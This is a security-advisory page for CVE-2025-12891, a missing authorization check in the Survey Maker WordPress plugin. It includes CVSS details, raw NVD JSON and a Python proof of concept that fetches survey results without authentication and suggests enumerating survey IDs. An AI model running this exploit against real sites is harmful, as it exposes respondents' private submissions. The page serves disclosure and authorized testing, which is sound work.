Security Vulnerability Report
中文
CVE-2025-12891 CVSS 5.3 MEDIUM

CVE-2025-12891

Published: 2025-11-13 05:16:03
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

The Survey Maker plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the 'ays_survey_show_results' AJAX endpoint in all versions up to, and including, 5.1.9.4. This makes it possible for unauthenticated attackers to view all survey submissions.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Survey Maker WordPress Plugin <= 5.1.9.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-12891 PoC - Survey Maker Unauthenticated Survey Results Access # Affected: Survey Maker plugin <= 5.1.9.4 for WordPress import requests import sys TARGET_URL = input("Enter WordPress URL: ").rstrip('/') SURVEY_ID = input("Enter Survey ID (numeric): ") endpoint = f"{TARGET_URL}/wp-admin/admin-ajax.php" headers = { 'Content-Type': 'application/x-www-form-urlencoded', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)' } # Craft the malicious request without any authentication data = { 'action': 'ays_survey_show_results', 'id': SURVEY_ID } print(f"[*] Sending request to {endpoint}") print(f"[*] Target Survey ID: {SURVEY_ID}") try: response = requests.post(endpoint, data=data, headers=headers, timeout=30) if response.status_code == 200: print(f"[+] Request successful!") print(f"[+] Response length: {len(response.text)} bytes") print("\n--- Response Preview ---") print(response.text[:1000]) else: print(f"[-] Request failed with status: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[-] Error: {e}") sys.exit(1) # Note: Enumerate survey IDs to access all survey submissions print("\n[!] To enumerate all surveys, iterate through different ID values")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-12891", "sourceIdentifier": "[email protected]", "published": "2025-11-13T05:16:03.007", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Survey Maker plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the 'ays_survey_show_results' AJAX endpoint in all versions up to, and including, 5.1.9.4. This makes it possible for unauthenticated attackers to view all survey submissions."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset/3394078/survey-maker/tags/5.1.9.5/admin/class-survey-maker-admin.php?old=3389474&old_path=survey-maker%2Ftags%2F5.1.9.4%2Fadmin%2Fclass-survey-maker-admin.php", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/835353e7-871d-4daf-9ed4-86321daf2366?source=cve", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.